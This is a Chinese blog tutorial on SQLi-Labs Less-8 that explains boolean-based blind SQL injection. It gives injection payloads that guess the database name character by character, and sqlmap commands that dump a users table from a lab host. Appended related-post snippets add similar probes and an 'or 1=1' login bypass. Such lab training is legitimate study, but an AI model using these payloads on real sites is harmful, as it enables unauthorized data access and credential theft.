【SQLi-Labs】Less-8 Blind- Boolian- Single Quotes- String

最新推荐文章于 2024-05-23 18:28:57 发布
最新推荐文章于 2024-05-23 18:28:57 发布
阅读量3.5k 收藏
点赞数
分类专栏: 【sqli-labs】SQL注入学习笔记 文章标签: 数据库 web安全 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xw1995115/article/details/121379209
版权

 本节来练习一下布尔盲注。

有时候,对目标网站进行注入会有这样的情况,对于用户的输入,页面不会有报错提示,只会有两种结果:

1.目标页面有内容(证明用户的输入正确有效)

2.目标界面没有内容(证明用户的输入无效,或页面将要显示的不是开发者想要给用户看的内容)

总结一句话就是,在某些时候服务器只会反馈你“说”的对不对,也就是判断你的输入为“真”或者为“假”。

这时候就要用到布尔盲注来“猜”或者“骗”服务器说出“真话”。

多说无益,实战来叙。

1.在SQLi-Labs Less-8中,添加参数 id=1显示:

 2.参数加单引号 页面变成:

 3.参数加双引号,括号等尝试后最终判断参数由单引号封闭,且对于非法输入目标服务器不会有任何响应,也就是显示空白

4.尝试用基于布尔的盲注进一步判断注入类型

?id=1' and '1'='1' --+   #显示正常
?id=1' and '1'>'2' --+   #页面空白

对于上面两条查询,"and"后面的表达式分别为“真”和“假”,和"and"前面的表达式通过AND连接后,整句查询的布尔值就分别变成了“true”和“false”,布尔值为true的表达式使得显示正常,布尔值为false的表达式使得页面显示空白。

5.现在“你说的话”,服务器会来帮你判断“真假”,那么是不是可以说明我如果猜对了表名字段名服务器一样可以告诉我“真假”,基于这个理论我们写出第一条Payload。

?id=1' AND (select MID((select database()),1,1))='a' --+  #页面空白说明数据库名第一个字符不是'a'
?id=1' AND (select MID((select database()),1,1))='b' --+  #页面空白说明数据库名第一个字符不是'b'
.
.
.
?id=1' AND (select MID((select database()),1,1))='s' --+  #页面有显示说明数据库名第一个字符是's'
?id=1' AND (select MID((select database()),1,2))='se' --+  #页面有显示说明数据库名前两个字符是'se'
?id=1' AND (select MID((select database()),1,8))='security' --+  #页面有显示说明数据库名前八个字符是'security'

最终判断出数据库名为'security'

6.基于以上基础我们可以爆表名,字段名,以及详细数据。

7.但手工做布尔盲注实在是太过麻烦和费时,我们可以使用工具(如sqlmap)辅助我们进行注入。

sqlmap -u http://10.1.2.210:8000/Less-8/?id=1 --dbs --batch

sqlmap -u http://10.1.2.210:8000/Less-8/?id=1 -D security -T users --dump --batch

sqlmap工具的详细用法以后介绍,至此,本节结束

丶亦洵
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs Less-8 Blind-- Boolian Based基于布尔的盲注
bigblue00的博客
06-16 393
Less-8 Blind-- Boolian Based基于布尔的盲注 1、回显分析 当输入的语句正确时,显示 You are in… 当输入的语句异常时,不显示任何信息 2、SQL盲注 根据页面的显示情况会有不同,可以构造判断语句,当语句成立时,显示You are in… 当语句不成立时,不显示任何信息。 先判断数据库名的长度: http://192.168.195.110/sqli-labs/Less-8/?id=1’and (length(database())>10) – + 页面无信息显示,
sqli-lab教程——Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)
luosaierdadi的博客
07-08 405
题目名字暴露一切,本来不想看的,又瞥到了,布尔型盲注,单引号,id=1回显,价格单引号不回显,构造一下验证是不是布尔型payload ?id=1' and 1=1 --+ 回显了,证明没跑了。 那就一步一步来吧,和less5一样的,根据回显判断。可以通过 > < 比较字符大小加速爆破暴库payload ?id=1' and left((select database()),1)='s'--+库名长度可使用?id=1' and length(database())=8--+ 判断,同理表名字,段名等。最后得到
sqli-labs练习(十一)--- POST-Error Based-Single quotes-String
wkend的博客
07-25 330
一般看到这种需要登录的可能第一反应就是使用暴力破解,但是这里我们主要讨论的是sql注入,所以爆破就不在这里讲了。 发现需要登录,尝试使用万能密码登录, 万能密码的介绍:https://bbs.ichunqiu.com/thread-10851-1-1.html payload:username=admin' or 1=1#,password=任意输入, 登录成功,同时得到了一个账号的用...
sqli-lab Less-1 GET - Error based - Single quotes - String
qq_45987965的博客
08-08 210
sqli-lab Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) ctf小白的学习笔记。 1. 判断有多少列, 超出列数会报错 通过输入?id=1' order by 正整数 --+ 说明有3列,即参数传递执行的查询有3个字段。 此处有一点搞不懂,输进去1、2、3,为什么就显示两个值呢? 查了资料发现,不是所有的查询都显示在网页前端的,为了确认能否返回前端,需要进行筛选(感觉这种方法有点像信号素)。 通过?id =
Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)
weixin_44368248的博客
04-14 561
1.根据图中的提示在url上加上?id=1 2.输入单引号,发现页面报错(通过在url中修改对应的id值。为正常数字、大数字、字符、(单引号、双引号、双单引号、括号)、反斜杆来探测url是否存在注入点) 由报错信息可知,可以通过单引号闭合 3.通过order by +数字来判断当前的字段数,输入order by 10报错,输入order by 5还报错,输入order by 3没有报错,在输入or...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
SQLi-Labs】Less-5 GET - Double Injection - Single Quotes - String
xw1995115的博客
11-15 476
本节练习涉及到了一个新的概念:双注入。 双注入简单理解为一个select查询里嵌套一个select查询,如果要利用双注入需要人为构造特定的能够造成报错的查询,从而在报错信息里返回我们需要的数据。需要用到的函数和语句有: 1.concat() 作用为连接括号里的参数。例concat(1,~,2) 结果为 1~2 2.floor() 作用为对括号里的非整数进行取整 如1.9取为1,2.1取为2 3.count() 作用为针对查询结果条数进行计数 4.rand() 作用为生成0-1范围内的随机数...
sqli-labs练习(十四)--- POST-Double Injection-Single quotes-String-with twist
wkend的博客
07-26 423
这一关与上一关很相似,唯一的区别就在于是采用双引号来闭合的, 直接可以用万能密码成功登录,比如123" or 1=1# 在获取数据库信息是把')替换为"即可。 payload:uname=123" union select count(*),concat(':',(select database()),':',floor(rand()*2))as a from information_s...
sqli-lab教程——1-35通关
缘木之鱼
05-08 5673
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges)Less-1 GET - Error...
sqli-labs】 less5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)...
ajxi63204的博客
01-19 429
双注入查询可以查看这两篇介绍 https://www.2cto.com/article/201302/190763.html https://www.2cto.com/article/201303/192718.html 简而言之就是构造如下的查询,会使得查询结果的一部分通过报错的形式显示出来 select count(*),concat((select version())...
GET_Blind_Boolian Based-single Quetes
weixin_46601529的博客
09-24 187
1.首先盲注是一般都是通过页面变化来判断是否存在注入 1)当传入数据正常时 url?id=1’ and 1=1 %23 2)当传入数据不正常时 url?id=1’ and 1=2 %23 显而易见少了一个 “YOU ARE IN” 那么就很好办,我们就可以就构建payload 2.盲注一般利用 ascii(),substr() ascii()将字符串转化成ascii码 substr(string,start,length)将字符串截取,第一个参数start从1开始不是0 group_conca.
sqli-labs】 less15 POST - Blind- Boolian/time Based - Single quotes (基于bool/时间的单引号POST型盲注)...
ajxi63204的博客
01-23 193
错误不回显了 构造永真登陆 登陆成功了 虽然登陆成功了,但是数据库的数据还么有爆出来 构造一下用户名 1' or length(database())=8# 如果数据库名的长度不等于8,登陆会失败 猜测数据库名第一个字符是否为's',是则登陆成功 1' or ascii(substr(database(),1,1))=115# ...
sqli-labs练习(八)------GET-Blind-Boolian Based-Sing Quotes
wkend的博客
04-26 523
输入1,回显You are in........... 输入1',没有回显 sql基于布尔的盲注 相关函数 函数 作用 length(str) 返回字符串str的长度 substr(str, pos, len) 将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的,不是数组的0开始 mid(s...
【MySQL精通之路】SQL优化(1)-查询优化(1)-WHERE子句
Anakki的博客
05-22 643
与PRIMARY KEY或UNIQUE索引上的WHERE子句一起使用的表,其中所有索引部分都与常量表达式进行比较,并定义为NOT NULL。由于MySQL会自动进行类似的优化,因此您通常可以避免这项工作,并将查询保留为更易于理解和维护的形式。因为MySQL优化器的开发工作还在进行中,所以这里并没有记录MySQL优化器所有的优化。您可能会试图重写查询以加快算术运算,同时牺牲可读性。,这有助于简化join连接。有关更多信息和示例,请参见“有关更多信息,请参见“空表或只有一行的表。
Linux文件操作——实现cp指令以及模拟修改配置文件
最新发布
shion1114的博客
05-23 342
cp 1.c 2.c功能是将(内容相同,实现拷贝)main函数的参数由编译结果可知,总共有三个输入参数,同时输出每个参数字符串内容。
sqli-labs less
07-28
抱歉,我无法回答关于sqli-labs less的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值